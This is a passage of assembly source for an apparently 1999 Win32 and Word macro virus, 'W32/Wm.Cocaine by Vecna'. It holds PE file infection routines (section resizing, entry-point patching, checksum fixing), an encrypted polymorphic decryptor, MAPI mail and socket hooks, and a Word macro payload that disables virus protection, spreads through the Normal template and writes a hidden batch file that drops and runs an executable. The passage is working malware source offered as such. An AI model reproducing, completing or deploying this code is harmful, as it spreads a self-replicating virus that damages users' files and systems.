mov [esi+peh_reloc2], ecx ;no more relocz
push edi esi
xchg edi, esi
mov edi, [esi+seh_raw]
add edi, [esi+seh_rawsz]
cmp dwo [ebp+(ofs RawSize-ofs vcode)], MIN_RAW
jb @@11
pushad
mov edi, [ebp+(ofs patch_jump-ofs vcode)]
mov eax, edi
add edi, ebx
call physical2virtual_ ;get rva of jump immediate
mov ebx, eax
mov eax, [ebp+(ofs ep-ofs vcode)]
sub eax, ebx ;sub it from new eip
sub eax, 4
mov [edi], eax ;patch jmp
popad
jmp @@12
@@11:
mov eax, [ebp+(ofs ep-ofs vcode)] ;get new eip
mov esi, [esp]
mov [esi+peh_entrypoint], eax ;set it in pe header
@@12:
add edi, ebx ;edi=raw ofs+raw sz+mbase
mov esi, [ebp+(ofs polybuffer-ofs vcode)]
mov edx, [ebp+(ofs tamanho-ofs vcode)]
mov ecx, edx
cld
rep movsb ;zopy vilus codle
pop esi edi
mov [esi+peh_chksum], ecx ;zero checksum
mov eax, edx
add eax, [esi+peh_initdata] ;init data size+vsize
call AlignF
mov [esi+peh_initdata], eax
mov [edi+seh_attr], 80000000h+40000000h+00000040h
;NT COMPATIBILITY ZONE
;all to make pe infection NT compliant is here
;hehe... you also must get the APIs right, of course
push dwo [ebp+(ofs fsizel-ofs vcode)]
push ebx
mov eax, [edi+seh_rawsz]
mov ebx, [edi+seh_rvasz]
; mov edx, [ebp+(ofs tamanho-ofs vcode)]
add eax, edx
add ebx, edx ;increase raw/virtual size
call AlignF
mov [edi+seh_rawsz], eax ;save aligned raw size
xchg eax, ebx
call AlignO ;align virtual size
cmp eax, ebx
jnb @@4 ;is below raw size?
mov eax, ebx
call AlignO ;then use raw size, realigned
@@4:
mov [edi+seh_rvasz], eax ;save aligned virtual size
mov eax, [edi+seh_rvasz] ;calculate last memory occuped
add eax, [edi+seh_rva]
call AlignO ;align
cmp eax, [esi+peh_imagesize] ;is bigger than previous one?
jb @@aa
mov [esi+peh_imagesize], eax ;if so, fix imagesize
@@aa:
call ChecksumMappedFile
mov [esi+peh_chksum], eax
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs buffer1-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)]
push 00004000h+00008000h
push 0
push dwo [ebp+(ofs buffer2-ofs vcode)]
call [ebp+(ofs _VirtualFree-ofs vcode)] ;free bufferz
mov by [ebp+(ofs inf?-ofs vcode)], 0
jmp @@0
@@fux0red:
popad
jmp @@a
wavp db 'AVP Monitor',0 ;inserted in middle of code ;)
remove_seh:
sub edx, edx
pop dwo fs:[edx] ;remove frame
pop edx
ret
Infect endp
AlignD proc
push ebp edx
mov ebp, DIV_VALUE
jmp _align
AlignD endp
AlignO proc
push ebp edx
mov ebp, [esi+56]
jmp _align
AlignO endp
AlignF proc
push ebp edx
mov ebp, [esi+60]
_align:
sub edx, edx
div ebp
test edx, edx
jz @@1
inc eax
sub edx, edx
@@1:
mul ebp
pop edx ebp
ret
AlignF endp
WriteMem proc
push 0 ;result
push ecx ;size
push esi ;buffer from
push edi ;where write
call [ebp+(ofs _GetCurrentProcess-ofs vcode)]
push eax ;handle to process
call [ebp+(ofs _WriteProcessMemory-ofs vcode)]
ret
WriteMem endp
cp_key db 0
GetList proc
lea edi, [ebp+(ofs directory-ofs vcode)]
push MAX_PATH
push edi
call [ebp+(ofs _GetSystemDirectoryA-ofs vcode)]
lea edi, [edi+eax]
call @@1
db '\BRSCBC.DAT', 0
@@1:
pop esi
@@2:
lodsb
stosb
test al, al
jnz @@2
ret
GetList endp
CheckList proc
push eax
call GetList
mov dwo [ebp+(ofs fsizel-ofs vcode)], 1*4
inc by [ebp+(ofs mf_mode-ofs vcode)]
inc by [ebp+(ofs mf_mode1-ofs vcode)]
call MapFile
mov [ebp+(ofs map@-ofs vcode)], eax
dec by [ebp+(ofs mf_mode-ofs vcode)]
dec by [ebp+(ofs mf_mode1-ofs vcode)]
mov edi, eax
test eax, eax
pop eax
jz @@1
mov ecx, [ebp+(ofs fsizel-ofs vcode)]
shr ecx, 2
repne scasd
push ecx
call UnmapFile
pop eax
@@1:
ret
CheckList endp
InsertList proc
call GetList
sub eax, eax
push eax
push 80h
push 3
push eax eax
push 0c0000000h ;read/write
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _CreateFileA-ofs vcode)]
inc eax
jz @@1
dec eax
push eax
sub ecx, ecx
push 2
push ecx
push ecx
push eax
call [ebp+(ofs _SetFilePointer-ofs vcode)]
mov eax, [esp]
push 0
call @@2
dd 0
@@2:
push 4
lea ecx, [ebp+(ofs email_crc-ofs vcode)]
push ecx
push eax
call [ebp+(ofs _WriteFile-ofs vcode)]
call [ebp+(ofs _CloseHandle-ofs vcode)]
@@1:
ret
InsertList endp
ChecksumMappedFile proc
push ebp
mov ebp, esp
push esi
push ecx
push edx
xor edx, edx
mov esi, [ebp+8]
mov ecx, [ebp+12]
shr ecx, 1
@@1:
movzx eax, wo [esi]
add edx, eax
mov eax, edx
and edx, 0FFFFh
shr eax, 10h
add edx, eax
add esi, 2
loop @@1
mov eax, edx
shr eax, 10h
add ax, dx
add eax, [ebp+12]
pop edx
pop ecx
pop esi
leave
retn 8
ChecksumMappedFile endp
SearchIT proc
pushad
call sne
mov esp,[esp+8] ;fix stack
_rseh:
sub eax, eax ;signal not found
jmp rseh
sne:
sub edx, edx
push dwo fs:[edx]
mov fs:[edx], esp ;set SEH
call gpa_kernel32 ;get add for the case it is bound
mov edi, eax
mov eax, dwo [esi+128] ;import dir
push edi
call virtual2physical
pop edi
jc @@3
mov edx, eax
add edx, ebx
@@2:
cmp dwo [edx], 0
je @@3
mov eax, [edx+12] ;get module name
push edi
call virtual2physical
pop edi
jc @@0
add eax, ebx
mov ecx, 12345678h
dll_name equ dwo $-4
call strcmp
jz @@1
@@0:
add edx, 20 ;check next
jmp @@2 ;process next dir
@@3:
jmp _rseh
@@1:
mov eax, [edx+16] ;pointer to name table pointer
mov ebp, eax
push edi
call virtual2physical
pop edi
jc @@3
add eax, ebx
mov edx, esi
mov esi, eax
sub ecx, ecx
@@4:
lodsd ;load pointer to name
test eax, eax
jz @@3 ;ebx=base
inc ecx
cmp eax, edi
jz @@6
cmp eax, 077f00000h
ja @@4 ;pointing to kernel? is bound
xchg esi, edx
push edi
call virtual2physical ;edx=table esi=pe header
pop edi
jc @@3
push edi
mov edi, [esp+(7*4)+4+8] ;load requested API
push esi
lea esi, [eax+ebx+2]
dec edi
@@7:
inc edi
lodsb
test al, al
jz @@5
cmp [edi], al
je @@7
pop esi
pop edi
xchg esi, edx ;esi=table edx=pe header
jmp @@4
@@5:
pop eax
pop eax
@@6:
dec ecx
lea eax, [ebp+(ecx*4)]
rseh:
sub edx, edx
pop dwo fs:[edx] ;remove frame
pop edx
mov dwo [esp+(7*4)], eax
popad
ret
SearchIT endp
strcmp proc
push edx ebx edi
@@2:
mov bl, [eax]
cmp bl, 'a'
jb @@3
cmp bl, 'z'
ja @@3
and bl, not 20h
@@3:
cmp by [ecx], 0
jz @@1
cmp [ecx], bl
jnz @@1
inc ecx
inc eax
jmp @@2
@@1:
pop edi ebx edx
ret
strcmp endp
virtual2physical proc
push ecx esi
mov edi, esi
movzx ecx, wo [esi+20]
add edi, 24
add edi, ecx ;edi eq 1th section header
movzx ecx, wo [esi+peh_nosections]
@@0:
push eax
sub eax, [edi+12] ;sub RVA
cmp eax, [edi+8] ;pointing inside?
jb @@1
pop eax
add edi, 40 ;next section header
loop @@0
sub eax, eax
stc ;signal error
jmp @@2
@@1:
add eax, [edi+20] ;add raw pointer
pop ecx ;fix stack
@@2:
pop esi ecx ;eax=fisical place
ret ;edi=section
virtual2physical endp
virtual2physical_ proc
pushad
mov esi, [ebp+(ofs pe_header-ofs vcode)]
call virtual2physical
mov [esp+(7*4)], eax
popad
ret
virtual2physical_ endp
physical2virtual_ proc
pushad
mov esi, [ebp+(ofs pe_header-ofs vcode)]
call physical2virtual
mov [esp+(7*4)], eax
popad
ret
physical2virtual_ endp
physical2virtual proc
push ecx esi
mov esi, [ebp+(ofs pe_header-ofs vcode)]
mov edi, esi
movzx ecx, wo [esi+20]
add edi, 24
add edi, ecx ;edi eq 1th section header
movzx ecx, wo [esi+peh_nosections]
@@0:
push eax
sub eax, [edi+20] ;sub physical start
cmp eax, [edi+16] ;still pointing to this section
jb @@1
pop eax
add edi, 40 ;next section header
loop @@0
sub eax, eax
stc ;signal error
jmp @@2
@@1:
add eax, [edi+12] ;add rva
pop ecx
@@2:
pop esi ecx ;eax=fisical place
ret ;edi=section
physical2virtual endp
MapFile proc
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
test eax, eax
jz @@1 ;if [mm_on_off] contains a @
clc ;treat it like a memory mapped
ret ;file
@@1:
push -1
mf_mode1 equ by $-1
pop ecx
jecxz @@212
push 80h
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
test eax, eax
jz error_map ;blank attributes
@@212:
sub eax, eax
push eax
push 80h
push 3
mf_mode equ by $-1
push eax eax
push 0c0000000h ;read/write
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _CreateFileA-ofs vcode)]
inc eax
jz error_mapf
dec eax
mov [ebp+(ofs handle1-ofs vcode)], eax
sub ebx, ebx
cmp [ebp+(ofs fsizel-ofs vcode)], ebx
jne @@2
push ebx
push eax
call [ebp+(ofs _GetFileSize-ofs vcode)]
mov [ebp+(ofs fsizel-ofs vcode)], eax
sub edx, edx
mov ecx, DIV_VALUE
div ecx
test edx, edx
jz close_map
@@2:
sub eax, eax
push eax
push dwo [ebp+(ofs fsizel-ofs vcode)]
push eax
push 4
push eax
push dwo [ebp+(ofs handle1-ofs vcode)]
call [ebp+(ofs _CreateFileMappingA-ofs vcode)]
test eax, eax
jz close_map
mov [ebp+(ofs handle2-ofs vcode)], eax
sub eax, eax
push dwo [ebp+(ofs fsizel-ofs vcode)]
push eax eax
push 2
push dwo [ebp+(ofs handle2-ofs vcode)]
call [ebp+(ofs _MapViewOfFile-ofs vcode)]
test eax, eax
jz unmap_map
ret
MapFile endp
CheckName proc
push ebp
call _seh
mov esp,[esp+8] ;fix stack
jmp remove_seh
_seh:
sub ecx, ecx
push dwo fs:[ecx]
mov fs:[ecx], esp
cld
call delta
lea edi, [ebp+(ofs directory-ofs vcode)]
push edi
mov esi, [esp+(7*4)+(4*6)+(2*4)] ;get pointer to path name
@@1:
lodsb
cmp al, '\'
jne @@5
inc ecx ;signal slash found
@@5:
cmp al, '"'
je @@1
cmp al, "'" ;ignore these
je @@1
cmp al, 'a'
jb @@3
cmp al, 'z'
ja @@3
and al, not 20h ;make upcase
@@3:
stosb
test al, al
jnz @@1
dec edi
jecxz @@7
@@2:
mov al, by [edi-1]
cmp al, 20h
je @@8
add bl, al ;calc chksum
@@8:
dec edi
cmp al, '\' ;find backslash
jnz @@2
@@7:
mov eax, edi
pop edx
jecxz @@6
sub eax, edx
push ebx
call ProcessDir ;process directory
pop ebx
@@6:
sub edx, edx
pop dwo fs:[edx] ;remove frame
pop edx
pop ebp
ret
CheckName endp
UnmapFile proc
mov eax, [ebp+(ofs mm_on_off-ofs vcode)]
test eax, eax
jz @@1
clc
ret
@@1:
push dwo [ebp+(ofs map@-ofs vcode)]
call [ebp+(ofs _UnmapViewOfFile-ofs vcode)]
unmap_map:
push dwo [ebp+(ofs handle2-ofs vcode)]
call [ebp+(ofs _CloseHandle-ofs vcode)]
close_map:
lea eax, dwo [ebp+(ofs lw_creat_h-ofs vcode)]
push eax
sub eax, 8
push eax
sub eax, 8
push eax
push dwo [ebp+(ofs handle1-ofs vcode)]
call [ebp+(ofs _SetFileTime-ofs vcode)]
push dwo [ebp+(ofs handle1-ofs vcode)]
call [ebp+(ofs _CloseHandle-ofs vcode)]
error_mapf:
push dwo [ebp+(ofs fattr-ofs vcode)]
lea eax, [ebp+(ofs directory-ofs vcode)]
push eax
call [ebp+(ofs _SetFileAttributesA-ofs vcode)]
error_map:
sub eax, eax
ret
UnmapFile endp
random0 proc
sub eax, eax
random proc
push ecx edx
push eax
call delta
mov eax, [ebp+(ofs pseed-ofs vcode)]
mov ecx, 41c64e6dh
mul ecx
add eax, 3039h
and eax, 7ffffffh
mov [ebp+(ofs pseed-ofs vcode)], eax
pop ecx
jecxz @@3 ;limit set?
sub edx, edx
div ecx
xchg eax, edx ;value = rnd MOD limit
@@3:
mov ecx, [esp+(2*4)] ;ecx=ret address
cmp by [ecx], 0cch ;is ret address a int3?
jne @@4
jmp ebp ;if so, start to exec garbage
@@4:
pop edx ecx
sahf ;random flagz
ret
random endp
random0 endp
;name +4
;size +8
;buffer +12
WriteDump proc
sub eax, eax
push eax
push 12345678h ;hidden file
wd_att equ dwo $-4
push 2
push eax eax
push 0c0000000h ;read/write
push dwo [esp+4+(6*4)]
call [ebp+(ofs _CreateFileA-ofs vcode)]
mov ebx, eax
push 0
call @@61
dd 0
@@61:
push dwo [esp+8+(2*4)]
push dwo [esp+12+(3*4)]
push ebx
call [ebp+(ofs _WriteFile-ofs vcode)]
push ebx
call [ebp+(ofs _CloseHandle-ofs vcode)]
ret 12
WriteDump endp
FileMask db '\*.*', 0, 0, 0, 0
macro_crypt proc
pushad
mov al, 0
macro_key equ by $-1
mov ecx, ofs macro_end-ofs macro_start
lea edi, [ebp+(ofs macro_start-ofs vcode)]
@@1:
xor by [edi], al
inc edi
loop @@1
popad
ret
macro_crypt endp
CRC32 proc
cld
push ebx
mov ecx, -1
mov edx, ecx
NextByteCRC:
xor eax, eax
xor ebx, ebx
lodsb
xor al, cl
mov cl, ch
mov ch, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr bx, 1
rcr ax, 1
jnc NoCRC
xor ax, 08320h
xor bx, 0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx, eax
xor edx, ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax, edx
rol eax, 16
mov ax, cx
ret
CRC32 endp
OpenAncev proc
sub eax, eax
push eax
push 80h
push 3
push eax eax
push 80000000h
call @@1
ancevsys db 'C:\ANCEV.SYS', 0
@@1:
call [ebp+(ofs _CreateFileA-ofs vcode)]
inc eax
jz @@filedontexists
dec eax
push eax
call [ebp+(ofs _CloseHandle-ofs vcode)]
@@fileexists:
clc
ret
@@filedontexists:
stc
ret
OpenAncev endp
align 4
dec_end_code equ this byte
DecriptInit proc
cld
sub eax, eax
db 0b8h+5 ;mov ebp, delta
_delta dd 00403000h
lea ebx, [ebp+(ofs vinit-ofs vcode)]
push ebx
lea ebx, [ebp+(ofs dec_end_code-ofs vcode)]
push dwo fs:[eax]
mov fs:[eax], esp ;set new seh frame
mov edi, ebp
mov eax, 0
key1 equ dwo $-4
@@1:
xor [edi], eax
scasd
add eax, 12345678h
org $-4
key2 dd 0
cmp edi, ebx
jne @@1
mov eax, cs:[0] ;cause fault
DecriptInit endp
ENDIF
vend equ this byte ;END OF PHYSICAL BODY
db 'EOV', 0
align 4
k32_address equ this byte
_CreateProcessA dd 0
_CreateFileA dd 0
_WinExec dd 0
_CloseHandle dd 0 ;add here a var that hold the
_LoadLibraryA dd 0
_FreeLibrary dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_SetEndOfFile dd 0
_VirtualAlloc dd 0
_VirtualFree dd 0
_GetSystemTime dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_GetCurrentDirectoryA dd 0
_SetFileAttributesA dd 0
_SetFileTime dd 0
_ExitProcess dd 0
_GetCurrentProcess dd 0
_WriteProcessMemory dd 0
_WriteFile dd 0
_DeleteFileA dd 0
_Sleep dd 0
_CreateThread dd 0
_GetFileSize dd 0
_SetFilePointer dd 0
_MessageBoxA dd 0
_FindWindowA dd 0
_PostMessageA dd 0
_RegCloseKey dd 0
_RegQueryValueEx dd 0
_RegOpenKeyEx dd 0
_RegCreateKeyEx dd 0
_RegSetValueEx dd 0
_GetModuleHandle dd 0
_GetProcAddress dd 0 ;basic api init
_connect dd 0
_recv dd 0
_MAPISendMail dd 0
old_eip dd 0 ;first entrypoint place
patch_jump dd 0 ;where last jump is(patch!!)
sRVA dd 0 ;CODE section paramz, for
RawSize dd 0 ;branch_entry
lgarble db 0 ;last garble indicator
inf? db 0 ;can infect file?
_dec dw 0 ;instruction used to decript
K32 dd 0 ;kernel32 base
U32 dd 0 ;user32 base
pseed dd 0 ;poly seed
variables dd 0
reg32 dd 0 ;table of reg used
buffer dd 0 ;current work buffer
_size dd 0 ;size to encript
entry dd 0 ;delta to entrypoint
rva dd 0 ;place in meory where virus
;will run
flagz dd 0 ;garbling flagz
c_reg dd 0 ;actual counter reg
p_reg dd 0 ;actual pointer reg
recurse dd 0 ;recursion deep
decriptor dd 0 ;start of decriptor in current
;buffer
search_handle dd 0
_socket dd 0
socket dd MAX_SOCK dup (0)
recv_size dd 0
recv_buff dd 0
email_w dd 0
thread dd 0
email db 128 dup (0)
email_crc dd 0
secz db 0
mdeep db 0
align 4
handle1 dd 0
handle2 dd 0
map@ dd 0 ;map address
tamanho dd 0 ;total added size
ep dd 0 ;new entrypoint
image_infect dd 0
OurTimer dd 0
polybuffer dd 0 ;address of buffer for poly
buffer1 dd 0 ;temporary poly bufferz
buffer2 dd 0
mm_on_off dd 0
pe_header dd 0
seed dd 0 ;main random seed
_mapi dd 0
subject dd 0
directory db MAX_PATH dup (0) ;work directory structure
lparm dd 0
lvars dd 0
subs_index dd 0
s_into db 0
_pusha db 0
fname db 32 dup (0)
align 4
current_time equ this byte
_year dw 0
_month dw 0
_dayofweek dw 0
_day dw 0
_hour dw 0
_minute dw 0
_second dw 0
_milisecond dw 0
find_data equ this byte
fattr dd 0
c_creat_h dd 0
c_creat_l dd 0
la_creat_h dd 0
la_creat_l dd 0
lw_creat_h dd 0
lw_creat_l dd 0
fsizeh dd 0
fsizel dd 0
reserved dd 0, 0
filename db 260 dup (0)
altname db 13 dup (0)
altext db 3 dup (0)
subs_table db 6*MAX_SUBROUTINES dup (0) ;dd where sub reside
;db no. of param that sub clean
;db no. of vars that sub alloc
MapiMessage struc
resd dd ?
lpszSubject dd ?
lpszNoteText dd ?
lpszMessageType dd ?
lpszDateReceived dd ?
lpszConversationID dd ?
flags dd ?
lpOriginator dd ?
nRecipCount dd ?
lpRecips dd ?
nFileCount dd ?
lpFiles dd ?
MapiMessage ends
MapiRecipDesc struc
resd dd ?
ulRecipClass dd ?
lpszName dd ?
lpszAddress dd ?
ulEIDSize dd ?
lpEntryID dd ?
MapiRecipDesc ends
MapiFileDesc struc
resd dd ?
flFlags dd ?
nPosition dd ?
lpszPathName dd ?
lpszFileName dd ?
lpFileType dd ?
MapiFileDesc ends
MF MapiFileDesc <0>
mend equ this byte
_VSEG ends
end main
;----------------------------------(HOST.INC)---------------------------------
;Generic Host
;(c) Vecna 1999
;First generation host. Just pass control to virus and, when get control again
;show a dialog box and exit.
_TEXT segment dword use32 public'CODE'
extrn ShellAboutA:Proc
extrn ExitProcess:pRoc
;I_AM_IDIOT_USER_THAT_CANT_COMPILE EQU TRUE ;antilamer code :P
main proc
IFNDEF I_AM_IDIOT_USER_THAT_CANT_COMPILE
jmp DecriptInit
ENDIF
host:
push 0
push ofs tit
push ofs msg
push 0
call ShellAboutA
push 0
call ExitProcess
main endp
_TEXT ends
_DATA segment dword use32 public 'DATA'
tit db 'W32/Wm.Cocaine by Vecna', 0
msg db 'Cocaine - A Win32/WinWord Virus#'
db 'Cocaine - Your PC is now addicted', 0
_DATA ends
;----------------------------------(HOST.INC)---------------------------------
;-----------------------------------(LZ.INC)----------------------------------
;LZ Decompression routines
;(c) Vecna 1999
;Converted from a C source
;These routines decompress a LZ packed buffer. They where coded in C, and
;converted to ASM using BCC32 with the -S switch. Beside the normal switchs
;to optimize, this was optimized by hand a bit. Virogen have in his www page
;a more optimized version of this routine, and other related material about
;compression in win32asm.
;void fast_copy(p_src,p_dst,len)
;
fast_copy proc
push edi esi ecx
mov ecx,dword ptr [esp+ 4+(4*3)]
mov edi,dword ptr [esp+ 8+(4*3)]
mov esi,dword ptr [esp+12+(4*3)]
cld
rep movsb
pop ecx esi edi
ret 12
fast_copy endp
lzrw1_decompress proc near
?live1@768:
;
; void lzrw1_decompress(p_src_first,src_len,p_dst_first,p_dst_len)
;
@27:
push ebp
mov ebp,esp
add esp,-8
push ebx
push esi
push edi
;
; /* Input : Specify input block using p_src_first and src_len. */
; /* Input : Point p_dst_first to the start of the output zone. */
; /* Input : Point p_dst_len to a ULONG to receive the output length. */
; /* Input : Input block and output zone must not overlap. User knows */
; /* Input : upperbound on output block length from earlier compression. */
; /* Input : In any case, maximum expansion possible is eight times. */
; /* Output : Length of output block written to *p_dst_len. */
; /* Output : Output block in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
; /* Output : Writes only in Mem[p_dst_first..p_dst_first+*p_dst_len-1]. */
; UBYTE *p_src_first, *p_dst_first; ULONG src_len, *p_dst_len;
; {UWORD controlbits=0, control;
;
?live1@784: ; EDI = control, ECX = p_src_first
xor esi,esi
?live1@800: ;
mov ecx,dword ptr [ebp+20]
;
; UBYTE *p_src=p_src_first+FLAG_BYTES, *p_dst=p_dst_first,
; *p_src_post=p_src_first+src_len;
;
?live1@816: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
;
mov ebx,dword ptr [ebp+16]
add ebx,ecx
?live1@832: ; EDI = control, ESI = controlbits, ECX = p_src_first
mov edx,dword ptr [ebp+12]
?live1@848: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
;
mov dword ptr [ebp-4],ebx
?live1@864: ; EDI = control, ESI = controlbits, ECX = p_src_first
lea eax,dword ptr [ecx+4]
;
; if (*p_src_first==FLAG_COPY)
;
?live1@880: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = p_src_first
;
cmp byte ptr [ecx],1
jne short @28
;
; {fast_copy(p_src_first+FLAG_BYTES,p_dst_first,src_len-FLAG_BYTES);
;
?live1@896: ; ECX = p_src_first
add ecx,4
push ecx
mov eax,dword ptr [ebp+12]
push eax
mov edi,dword ptr [ebp+16]
sub edi,4
push edi
call fast_copy
;
; *p_dst_len=src_len-FLAG_BYTES; return;}
;
?live1@912: ; EDI = @temp14
mov eax,dword ptr [ebp+8]
mov dword ptr [eax],edi
jmp short @29
;
; while (p_src!=p_src_post)
;
?live1@928: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@28:
cmp eax,dword ptr [ebp-4]
je short @31
;
; {if (controlbits==0)
;
@30:
test esi,esi
jne short @32
;
; {control=*p_src++; control|=(*p_src++)<<8; controlbits=16;}
;
?live1@960: ; EAX = p_src, EDX = p_dst
movzx edi,byte ptr [eax]
inc eax
xor ecx,ecx
; mov esi,16
push 16
pop esi
mov cl,byte ptr [eax]
shl ecx,8
or edi,ecx
inc eax
;
; if (control&1)
;
?live1@976: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@32:
test edi,1
je short @33
; jnc short @33
;
; {UWORD offset,len; UBYTE *p;
; offset=(*p_src&0xF0)<<4; len=1+(*p_src++&0xF);
;
@34:
xor ebx,ebx
xor ecx,ecx
mov bl,byte ptr [eax]
mov cl,byte ptr [eax]
and ebx,15
inc eax
inc ebx
and ecx,240
mov dword ptr [ebp-8],ebx
;
; offset+=*p_src++&0xFF; p=p_dst-offset;
;
?live1@1008: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
;
xor ebx,ebx
mov bl,byte ptr [eax]
inc eax
?live1@1024: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
shl ecx,4
?live1@1040: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits, ECX = offset
;
and ebx,255
add ecx,ebx
mov ebx,edx
sub ebx,ecx
mov ecx,ebx
jmp short @36
;
; while (len--) *p_dst++=*p++;}
;
?live1@1056: ; EAX = p_src, EDX = p_dst, ECX = p, EDI = control, ESI = controlbits
;
@35:
mov bl,byte ptr [ecx]
inc ecx
mov byte ptr [edx],bl
inc edx
@36:
mov ebx,dword ptr [ebp-8]
add dword ptr [ebp-8],-1
test ebx,ebx
jne short @35
@37:
jmp short @38
;
; else
; *p_dst++=*p_src++;
;
?live1@1072: ; EAX = p_src, EDX = p_dst, EDI = control, ESI = controlbits
@33:
mov cl,byte ptr [eax]
inc eax
mov byte ptr [edx],cl
inc edx
;
; control>>=1; controlbits--;
;
@38:
shr edi,1
dec esi
cmp eax,dword ptr [ebp-4]
jne short @30
;
; }
; *p_dst_len=p_dst-p_dst_first;
;
?live1@1120: ; EDX = p_dst
@31:
sub edx,dword ptr [ebp+12]
mov eax,dword ptr [ebp+8]
mov dword ptr [eax],edx
;
; }
;
?live1@1136: ;
@39:
@29:
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
ret 16
lzrw1_decompress endp
;-----------------------------------(LZ.INC)----------------------------------
;---------------------------------(MACRO.INC)---------------------------------
;Macro poly data
;(c) Vecna 1999
;ASM->COM->LZ->INC
;The code in COMMENT bellow is to be compiled to a .COM file, then compressed
;with my LZ compressor, then BIN2INCed. It is the code used for macro poly
;engine and do the actual infection process. The macro code is divided in
;chunks. The format of each chunks is simple: the first byte indicate the
;step that this chunk will be processed, and follow a ASCIIZ string. The macro
;poly engine copies each chunk, mixing the ones from the same level between
;themselfs, and inserting macro garbage code between real macro lines. Some
;chunks(6) receive special processing by the engine ;-)
;The macro poly engine also do magic with the %X labels: they're changed by
;random strings.
; '%1
; SUB AUTOCLOSE()
; ON ERROR RESUME NEXT
;OPTIONS.VIRUSPROTECTION = FALSE
; OPTIONS.CONFIRMCONVERSIONS = FALSE
; OPTIONS.SAVENORMALPROMPT = FALSE
; APPLICATION.DISPLAYALERTS = WDALERTSNONE
; SHOWVISUALBASICEDITOR = FALSE
; %2=1
; %3=1
; FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT
; IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %2=%4
; NEXT %4
; FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT
; IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %3=%4
; NEXT %4
; OPEN "C:\%7.BAT" FOR OUTPUT AS 1
; PRINT #1,"@ECHO OFF"
; PRINT #1,"DEBUG <C:\COCAINE.SRC >NUL"
; PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"
; PRINT #1,"C:\W32COKE.EXE"
; PRINT #1,"DEL C:\W32COKE.EX >NUL"
; PRINT #1,"DEL C:\COCAINE.SRC >NUL"
; PRINT #1,"DEL C:\COCAINE.SYS >NUL"
; PRINT #1,"DEL C:\W32COKE.EXE >NUL"
; PRINT #1,"DEL C:\%7.BAT >NUL"
; CLOSE #1
; SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE
; SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE
; IF %5.LINES(1, 1) <> "'%1" THEN
; %5.DELETELINES 1, %5.COUNTOFLINES
; %5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)
; END IF
; IF %6.LINES(1, 1) <> "'%1" THEN
; %6.DELETELINES 1, %6.COUNTOFLINES
; %6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)
; END IF
; OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1
; CLOSE 1
; SHELL %7.BAT, VBHIDE
; FOR %4 = 1 TO 100
; NEXT %4
; KILL %7.BAT
; END SUB
;
; The following code should be compiled to a .COM file:
;
; .MODEL TINY
; .CODE
; .STARTUP
;
; CRLF EQU <13,10>
;
; DB 1
; DB "'%1", CRLF
; DB "SUB AUTOCLOSE()", CRLF
; DB "ON ERROR RESUME NEXT", CRLF
; DB 0
;
; DB 2
; DB "OPTIONS.VIRUSPROTECTION = FALSE", CRLF
; DB 0
;
; DB 2
; DB "OPTIONS.CONFIRMCONVERSIONS = FALSE", CRLF
; DB 0
;
; DB 2
; DB "OPTIONS.SAVENORMALPROMPT = FALSE", CRLF
; DB 0
;
; DB 2
; DB "APPLICATION.DISPLAYALERTS = WDALERTSNONE", CRLF
; DB 0
;
; DB 2
; DB "SHOWVISUALBASICEDITOR = FALSE", CRLF
; DB 0
;
; DB 2
; DB "%2=1", CRLF
; DB 0
;
; DB 2
; DB "%3=1", CRLF
; DB 0
;
; DB 3
; DB "FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT", CRLF
; DB 'IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %2=%4', CRLF
; DB "NEXT %4", CRLF
; DB 0
;
; DB 3
; DB "FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT", CRLF
; DB 'IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %3=%4', CRLF
; DB "NEXT %4", CRLF
; DB 0
;
; DB 3
; DB 'OPEN "C:\%7.BAT" FOR OUTPUT AS 1', CRLF
; DB 'PRINT #1,"@ECHO OFF"', CRLF
; DB 'PRINT #1,"DEBUG <C:\COCAINE.SRC >NUL"', CRLF
